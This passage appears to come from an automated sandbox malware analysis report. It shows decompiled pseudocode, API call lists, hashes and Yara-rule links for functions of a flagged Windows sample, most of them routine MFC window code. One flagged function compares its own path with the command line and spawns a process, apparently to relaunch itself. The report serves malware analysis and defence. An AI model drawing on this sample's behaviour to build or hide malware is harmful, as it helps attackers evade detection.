                  • API String ID: 1031845853-0
                  • Opcode ID: b9b20a255bf8ec8179fb1d58bd2a46d1a8caece91da757cd9b7519637d2d4eb4
                  • Instruction ID: c70a73cfab10beb5ae40e0ca9f9cf222f8cc2b62db800e03fd6d50582627701f
                  • Opcode Fuzzy Hash: b9b20a255bf8ec8179fb1d58bd2a46d1a8caece91da757cd9b7519637d2d4eb4
                  • Instruction Fuzzy Hash: F2F067B1E40724BAE7105F72AC4AB1A7F68FB41721F014826E6158B280EBB598108FD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00411F96, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 244COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 458 411f96-411fae call 41f363 461 411fb0-411fb3 458->461 462 411fb8-411ff3 call 431160 call 41f363 458->462 463 412284-412285 461->463 468 412011-412015 462->468 469 411ff5-41200e call 411c95 462->469 471 412035-412039 468->471 472 412017-412030 call 411c95 468->472 469->468 479 412010 469->479 475 41203b-412057 call 411c95 471->475 476 41205c-412060 471->476 472->471 485 412032 472->485 475->476 491 412059 475->491 477 412082-412085 476->477 478 412062-41207d call 411f52 476->478 483 412087-4120aa call 411f52 477->483 484 4120ae-4120b2 477->484 478->477 492 41207f 478->492 479->468 483->484 499 4120ac 483->499 489 4120d2-4120d6 484->489 490 4120b4-4120cb call 40f52e 484->490 485->471 495 4120d8-4120ea call 40f52e 489->495 496 4120ec-4120f0 489->496 490->489 491->476 492->477 495->496 497 4120f2-412107 call 40f52e 496->497 498 412109-412111 496->498 497->498 504 412113-412120 call 40f52e 498->504 505 412122-41212a 498->505 499->484 504->505 508 41212c-41213d call 40f52e 505->508 509 41213f-412147 505->509 508->509 512 412149-41215a call 40f52e 509->512 513 41215c-412164 509->513 512->513 514 412166-412177 call 40f52e 513->514 515 412179-412181 513->515 514->515 520 412183-41218f call 40f52e 515->520 521 412196-41219e 515->521 526 412194 520->526 524 4121a0-4121b1 call 40f52e 521->524 525 4121b3-4121bb 521->525 524->525 528 4121bd-4121ca call 40f52e 525->528 529 4121cc-4121d4 525->529 526->521 528->529 530 4121e5-4121ed 529->530 531 4121d6-4121e3 call 40f52e 529->531 536 412202-41220a 530->536 537 4121ef-412200 call 40f52e 530->537 531->530 540 41220c-41221d call 40f52e 536->540 541 41221f-412227 536->541 537->536 540->541 544 412229-412236 call 40f52e 541->544 545 412238-412240 541->545 544->545 546 412242-412253 call 40f52e 545->546 547 412255-412269 545->547 546->547 552 412274-412283 547->552 553 41226b-412271 547->553 552->463 553->552
                  C-Code - Quality: 94%
                  			E00411F96(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t127;
				void* _t133;
				intOrPtr _t135;
				signed int _t145;
				signed int _t150;
				signed int _t167;
				signed int _t183;
				signed int _t185;
				signed int _t187;
				signed int _t189;
				signed int _t191;
				signed int _t195;
				void* _t198;
				intOrPtr _t199;
				signed int _t209;

				_t198 = __ecx;
				_t127 = E0041F363(__ebx, __edi, __esi, __eflags);
				_v8 = _t127;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t127 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 0;
				E00431160(0,  &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t133 = E0041F363(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t133 + 8));
				_t135 =  *0x466550; // 0x10003
				_t195 = 8;
				_v32 = _t135;
				_v16 = _t195;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd90s";
					_t191 = E00411C95(_t195, _t198, 0, 0, __eflags);
					__eflags = _t191;
					if(_t191 != 0) {
						_t209 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl90s";
					_t189 = E00411C95(_t195, _t198, 0, _t209, __eflags);
					__eflags = _t189;
					if(_t189 != 0) {
						_t209 = _t209 | 0x00000020;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar90s";
					_v28 = 0x10;
					_t187 = E00411C95(_t195, _t198, 0, _t209, __eflags);
					__eflags = _t187;
					if(_t187 != 0) {
						_t209 = _t209 | 0x00000002;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t195;
					_v28 = 0;
					_t185 = E00411F52(_t198, __eflags,  &_v56, "AfxMDIFrame90s", 0x7a01);
					__eflags = _t185;
					if(_t185 != 0) {
						_t209 = _t209 | 0x00000004;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & _t195;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t183 = E00411F52(_t198, __eflags,  &_v56, "AfxFrameOrView90s", 0x7a02);
					__eflags = _t183;
					if(_t183 != 0) {
						_t209 = _t209 | _t195;
						__eflags = _t209;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x40);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x80);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t195;
					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x100);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x200);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x400);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x800);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t167 = E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x1000); // executed
					_t209 = _t209 | _t167;
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x2000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x4000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x8000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x10000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x20000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x40000);
					__eflags = _t209;
				}
				__eflags = _a4 & 0x00080000;
				if(__eflags != 0) {
					_v12 = 0x1000;
					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x80000);
					__eflags = _t209;
				}
				_t199 = _v8;
				 *(_t199 + 0x18) =  *(_t199 + 0x18) | _t209;
				_t145 =  *(_t199 + 0x18);
				__eflags = (_t145 & 0x00003fc0) - 0x3fc0;
				if((_t145 & 0x00003fc0) == 0x3fc0) {
					 *(_t199 + 0x18) = _t145 | 0x00000010;
					_t209 = _t209 | 0x00000010;
					__eflags = _t209;
				}
				asm("sbb eax, eax");
				_t150 =  ~((_t209 & _a4) - _a4) + 1;
				__eflags = _t150;
				return _t150;
			}




























                  0x00411f96
                  0x00411f9e
                  0x00411fa3
                  0x00411fab
                  0x00411fab
                  0x00411fae
                  0x00000000
                  0x00411fb2
                  0x00411fb8
                  0x00411fb9
                  0x00411fba
                  0x00411fc4
                  0x00411fc6
                  0x00411fd3
                  0x00411fd6
                  0x00411fdb
                  0x00411fe4
                  0x00411fe7
                  0x00411fec
                  0x00411fed
                  0x00411ff0
                  0x00411ff3
                  0x00411ff8
                  0x00411ff9
                  0x00412000
                  0x00412007
                  0x0041200c
                  0x0041200e
                  0x00412010
                  0x00412010
                  0x00412010
                  0x0041200e
                  0x00412011
                  0x00412015
                  0x00412017
                  0x00412021
                  0x00412022
                  0x00412029
                  0x0041202e
                  0x00412030
                  0x00412032
                  0x00412032
                  0x00412032
                  0x00412030
                  0x00412035
                  0x00412039
                  0x0041203e
                  0x0041203f
                  0x00412042
                  0x00412049
                  0x00412050
                  0x00412055
                  0x00412057
                  0x00412059
                  0x00412059
                  0x00412059
                  0x00412057
                  0x0041205c
                  0x00412060
                  0x00412070
                  0x00412073
                  0x00412076
                  0x0041207b
                  0x0041207d
                  0x0041207f
                  0x0041207f
                  0x0041207f
                  0x0041207d
                  0x00412082
                  0x00412085
                  0x00412095
                  0x0041209c
                  0x004120a3
                  0x004120a8
                  0x004120aa
                  0x004120ac
                  0x004120ac
                  0x004120ac
                  0x004120aa
                  0x004120ae
                  0x004120b2
                  0x004120bd
                  0x004120c9
                  0x004120cb
                  0x004120cb
                  0x004120cb
                  0x004120cb
                  0x004120d2
                  0x004120d6
                  0x004120de
                  0x004120ea
                  0x004120ea
                  0x004120ea
                  0x004120ec
                  0x004120f0
                  0x004120fb
                  0x00412107
                  0x00412107
                  0x00412107
                  0x0041210e
                  0x00412111
                  0x00412118
                  0x00412120
                  0x00412120
                  0x00412120
                  0x00412127
                  0x0041212a
                  0x00412131
                  0x0041213d
                  0x0041213d
                  0x0041213d
                  0x00412144
                  0x00412147
                  0x0041214e
                  0x0041215a
                  0x0041215a
                  0x0041215a
                  0x00412161
                  0x00412164
                  0x0041216b
                  0x00412177
                  0x00412177
                  0x00412177
                  0x0041217e
                  0x00412181
                  0x00412188
                  0x0041218f
                  0x00412194
                  0x00412194
                  0x00412194
                  0x0041219b
                  0x0041219e
                  0x004121a5
                  0x004121b1
                  0x004121b1
                  0x004121b1
                  0x004121b8
                  0x004121bb
                  0x004121c2
                  0x004121ca
                  0x004121ca
                  0x004121ca
                  0x004121d1
                  0x004121d4
                  0x004121db
                  0x004121e3
                  0x004121e3
                  0x004121e3
                  0x004121ea
                  0x004121ed
                  0x004121f4
                  0x00412200
                  0x00412200
                  0x00412200
                  0x00412207
                  0x0041220a
                  0x00412211
                  0x0041221d
                  0x0041221d
                  0x0041221d
                  0x00412224
                  0x00412227
                  0x0041222e
                  0x00412236
                  0x00412236
                  0x00412236
                  0x0041223d
                  0x00412240
                  0x00412247
                  0x00412253
                  0x00412253
                  0x00412253
                  0x00412255
                  0x00412258
                  0x0041225b
                  0x00412267
                  0x00412269
                  0x0041226e
                  0x00412271
                  0x00412271
                  0x00412271
                  0x00412280
                  0x00412282
                  0x00412282
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID: @$@$AfxControlBar90s$AfxFrameOrView90s$AfxMDIFrame90s
                  • API String ID: 2102423945-1210016405
                  • Opcode ID: 48f1f3766a55285f2edbc49f154cf69d3c1f460646b03b50caf20c9a1f8d3e0c
                  • Instruction ID: a80ea7a57d0ef6c1a4e0f94e743f0cf838566c70e38dc4dc6695c3c797ddb862
                  • Opcode Fuzzy Hash: 48f1f3766a55285f2edbc49f154cf69d3c1f460646b03b50caf20c9a1f8d3e0c
                  • Instruction Fuzzy Hash: 2091F175D00209BBDB50DFD4C586BDFBFE8AB48344F14817AFA08E6181E7B88A95C794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406EBD, Relevance: 10.6, APIs: 7, Instructions: 127windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 555 406ebd-406f11 call 431db1 559 407012-40701f call 430650 555->559 560 406f17-406f4c call 412b38 call 412b6c 555->560 568 406fa5-406fc5 call 412b6c 560->568 569 406f4e-406fa2 SendMessageA * 5 560->569 572 406fca-406fd6 568->572 569->568 573 407005-407007 572->573 574 406fd8-406fda 572->574 577 407009-40700c InvalidateRect 573->577 575 406fe3-406ffb 574->575 576 406fdc-406fe1 574->576 575->559 579 406ffd-407003 575->579 576->573 576->575 577->559 579->577
                  C-Code - Quality: 63%
                  			E00406EBD(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t50;
				signed char _t57;
				void* _t68;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				signed int _t89;

				_t86 = __edx;
				_t43 =  *0x463404; // 0x38a11573
				_v8 = _t43 ^ _t89;
				_t87 = _a8;
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x118))();
				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t87 + 0xa)) = 0;
				 *((char*)(_t87 + 0xb)) = 0;
				if(E00431DB1(_t87,  &_v28, 0x14) != 0) {
					_t50 = E00412B38(_t88);
					_t69 = _t50;
					_v36 = _t50;
					E00412B6C(_t88, 0x10000000, 0, 0); // executed
					 *((intOrPtr*)( *_t88 + 0x118))(0x416, _a4, 0, _t68);
					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
						_t69 = _v36;
					}
					 *((intOrPtr*)( *_t88 + 0x118))(_a4, _t87);
					E00412B6C(_t88, 0, _t69 & 0x10000000, 0); // executed
					_t57 =  *((intOrPtr*)(_t87 + 9));
					_t68 = 0x415;
					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
						_push(1);
						_push(0);
						goto L9;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x118))() != 0) {
							_push(1);
							_push( &_v52);
							L9:
							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
						}
					}
				}
				return E00430650(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
			}






















                  0x00406ebd
                  0x00406ec5
                  0x00406ecc
                  0x00406ed1
                  0x00406ed4
                  0x00406edb
                  0x00406edc
                  0x00406ee1
                  0x00406ee6
                  0x00406eec
                  0x00406ef7
                  0x00406efb
                  0x00406eff
                  0x00406f03
                  0x00406f11
                  0x00406f1a
                  0x00406f23
                  0x00406f2c
                  0x00406f2f
                  0x00406f42
                  0x00406f4c
                  0x00406f6b
                  0x00406f6e
                  0x00406f7f
                  0x00406f8e
                  0x00406f99
                  0x00406f9b
                  0x00406fa2
                  0x00406fa2
                  0x00406fb2
                  0x00406fc5
                  0x00406fca
                  0x00406fd2
                  0x00406fd6
                  0x00407005
                  0x00407007
                  0x00000000
                  0x00406fe3
                  0x00406fe8
                  0x00406fe9
                  0x00406fee
                  0x00406ffb
                  0x00406ffd
                  0x00407002
                  0x00407009
                  0x0040700c
                  0x0040700c
                  0x00406ffb
                  0x00406fd6
                  0x0040701f

                  APIs
                  • _memcmp.LIBCMT ref: 00406F07
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SendMessageA.USER32(?,0000043D,00000000,00000000), ref: 00406F60
                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00406F6E
                  • SendMessageA.USER32(?,0000043C,?,00000000), ref: 00406F7F
                  • SendMessageA.USER32(?,0000043C,?,00000000), ref: 00406F8E
                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00406F99
                  • InvalidateRect.USER32(?,00000000,00000001,00000000,00000000), ref: 0040700C
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateLongRectWindow_memcmp
                  • String ID:
                  • API String ID: 235743446-0
                  • Opcode ID: b4ca3858cf842c725fa609f0672fd941354109755bb967841d1566607b793c20
                  • Instruction ID: 911494d41f6155cba064028fc0f85afa7879889cb5e7fc441d97dfeff554b02b
                  • Opcode Fuzzy Hash: b4ca3858cf842c725fa609f0672fd941354109755bb967841d1566607b793c20
                  • Instruction Fuzzy Hash: CE417E30740208BBEB219F65CC56FEEBBB4FF08B14F104529F6556A2D1CBB4A950CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0231CD97, Relevance: 10.6, APIs: 7, Instructions: 63stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0231CDBC
                  • GetCommandLineW.KERNEL32 ref: 0231CDFA
                  • lstrlenW.KERNEL32(00000000), ref: 0231CE03
                  • lstrlenW.KERNEL32(?), ref: 0231CE12
                  • lstrcmpiW.KERNEL32(00000000,?), ref: 0231CE27
                  • ExitProcess.KERNEL32 ref: 0231CE38
                    • Part of subcall function 02311CC2: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311CF2
                  • ExitProcess.KERNEL32 ref: 0231CE5F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleNamelstrcmpi
                  • String ID:
                  • API String ID: 1899540587-0
                  • Opcode ID: 27e6d8f8bc057fafb3987002e0d22941d5156ec4a2b0fa388ffe3fc28f80171b
                  • Instruction ID: 6134659132cacbc68564661ef99b331a4e3629b898ca9f58c5c7eb12dc1d0383
                  • Opcode Fuzzy Hash: 27e6d8f8bc057fafb3987002e0d22941d5156ec4a2b0fa388ffe3fc28f80171b
                  • Instruction Fuzzy Hash: FE11D0B2980118ABDB38A7A4DC88EFF77BDEB54B45F010569E60993140EF305D5DCEA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416A7E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 88%
                  			E00416A7E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t18;
				void* _t44;
				void* _t48;

				_t42 = __edx;
				_t31 = __ebx;
				_push(8);
				_t18 = E00431A9B(E0044B456, __ebx, __edi, __esi);
				_t44 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x90)) == 0) {
					_t51 =  *((intOrPtr*)(__ecx + 0x92));
					if( *((intOrPtr*)(__ecx + 0x92)) == 0) {
						E004014C0(_t48 - 0x14, __edx);
						 *((intOrPtr*)(_t48 - 4)) = 0;
						E004292E7(__ebx, __edx,  *((intOrPtr*)(E0041F363(__ebx, _t44, 0, _t51) + 8)), _t48 - 0x14); // executed
						_push(PathFindFileNameA( *(_t48 - 0x14)));
						E00406039(_t31, _t48 - 0x10, _t42, _t44, 0, _t51);
						 *((char*)(_t48 - 4)) = 1;
						PathRemoveExtensionA(E0040A688(_t48 - 0x10));
						E0040A356(_t48 - 0x10, 0xffffffff);
						 *((short*)(_t44 + 0x90)) = GlobalAddAtomA( *(_t48 - 0x10));
						 *((short*)(_t44 + 0x92)) = GlobalAddAtomA("system");
						E004010B0( &(( *(_t48 - 0x10))[0xfffffffffffffff0]), _t42);
						_t18 = E004010B0( &(( *(_t48 - 0x14))[0xfffffffffffffff0]), _t42);
					}
				}
				return E00431B73(_t18);
			}






                  0x00416a7e
                  0x00416a7e
                  0x00416a7e
                  0x00416a85
                  0x00416a8a
                  0x00416a95
                  0x00416a9b
                  0x00416aa2
                  0x00416aab
                  0x00416ab0
                  0x00416ac0
                  0x00416ace
                  0x00416ad2
                  0x00416ada
                  0x00416ae4
                  0x00416aef
                  0x00416b04
                  0x00416b13
                  0x00416b1a
                  0x00416b25
                  0x00416b25
                  0x00416aa2
                  0x00416b2f

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00416A85
                    • Part of subcall function 004292E7: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                    • Part of subcall function 004292E7: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  • PathFindFileNameA.SHLWAPI(?,00000008,004017F8), ref: 00416AC8
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • PathRemoveExtensionA.SHLWAPI(00000000,00000000), ref: 00416AE4
                  • GlobalAddAtomA.KERNEL32 ref: 00416AFD
                  • GlobalAddAtomA.KERNEL32 ref: 00416B0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: NamePath$AtomFileGlobalH_prolog3$ExtensionFindModuleRemoveShort
                  • String ID: system
                  • API String ID: 403193770-3377271179
                  • Opcode ID: 715c8a44715037ab561ca445d125d12101abcb7d420da627e4c206c2fae4e1a1
                  • Instruction ID: 6af8255d80fce4e2872a3a295f9b7920885497d175e20f34bb1b1a59f62aa56d
                  • Opcode Fuzzy Hash: 715c8a44715037ab561ca445d125d12101abcb7d420da627e4c206c2fae4e1a1
                  • Instruction Fuzzy Hash: E1117031800126ABCF05EBB5CC46AAFB774BF00358F50422EB425272E2DB782944C7AE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042FFA2, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 95%
                  			E0042FFA2(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t14;
				intOrPtr _t17;
				void* _t18;
				struct HINSTANCE__* _t19;
				void* _t31;
				intOrPtr _t35;
				void* _t36;
				void* _t37;

				_t37 = __eflags;
				_t32 = __edi;
				_t31 = __edx;
				_t25 = __ebx;
				_t11 = SetErrorMode(0); // executed
				SetErrorMode(_t11 | 0x00008001); // executed
				_t14 = E0041F363(__ebx, __edi, SetErrorMode, _t37);
				_t35 = _a4;
				 *((intOrPtr*)(_t14 + 8)) = _t35;
				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
				E0041EB0A(__ebx, _t14, _t31); // executed
				_t17 =  *((intOrPtr*)(E0041F363(_t25, __edi, _t35, _t37) + 4));
				_t38 = _t17;
				if(_t17 != 0) {
					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
					E0042FE1C(_t17, _t31, _t38); // executed
				}
				_t18 = E0041F363(_t25, _t32, _t35, _t38);
				_t39 =  *((char*)(_t18 + 0x14));
				_pop(_t36);
				if( *((char*)(_t18 + 0x14)) == 0) {
					E004161F7(_t36, _t39);
				}
				_t19 = GetModuleHandleA("user32.dll");
				if(_t19 != 0) {
					 *0x46633c = GetProcAddress(_t19, "NotifyWinEvent");
				}
				return 1;
			}














                  0x0042ffa2
                  0x0042ffa2
                  0x0042ffa2
                  0x0042ffa2
                  0x0042ffb0
                  0x0042ffb8
                  0x0042ffba
                  0x0042ffbf
                  0x0042ffc4
                  0x0042ffc7
                  0x0042ffca
                  0x0042ffd4
                  0x0042ffd7
                  0x0042ffd9
                  0x0042ffde
                  0x0042ffe4
                  0x0042ffe9
                  0x0042ffec
                  0x0042ffec
                  0x0042fff1
                  0x0042fff6
                  0x0042fffa
                  0x0042fffb
                  0x0042fffd
                  0x0042fffd
                  0x00430007
                  0x0043000f
                  0x0043001d
                  0x0043001d
                  0x00430026

                  APIs
                  • SetErrorMode.KERNELBASE(00000000), ref: 0042FFB0
                  • SetErrorMode.KERNELBASE(00000000), ref: 0042FFB8
                    • Part of subcall function 0041EB0A: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EB42
                    • Part of subcall function 0041EB0A: SetLastError.KERNEL32(0000006F), ref: 0041EB59
                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00430007
                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00430017
                    • Part of subcall function 0042FE1C: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042FE59
                    • Part of subcall function 0042FE1C: PathFindExtensionA.KERNELBASE(?), ref: 0042FE73
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FEBB
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FEFA
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FF41
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ErrorModule__strdup$FileModeName$AddressExtensionFindHandleLastPathProc
                  • String ID: NotifyWinEvent$user32.dll
                  • API String ID: 621541537-597752486
                  • Opcode ID: c6a86a99ad862286b29c596775c83a7a365c59ac402591dd4d029d8a3d1260bd
                  • Instruction ID: c3559d0f6dcdbc91b9a4477413689282f5a49392fc776aba5323f530c7d64581
                  • Opcode Fuzzy Hash: c6a86a99ad862286b29c596775c83a7a365c59ac402591dd4d029d8a3d1260bd
                  • Instruction Fuzzy Hash: 9C015E74A102149BD714AF66A845A9A3AE8AB08724B05806BF845D7352DA78D8448B69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00417A77, Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
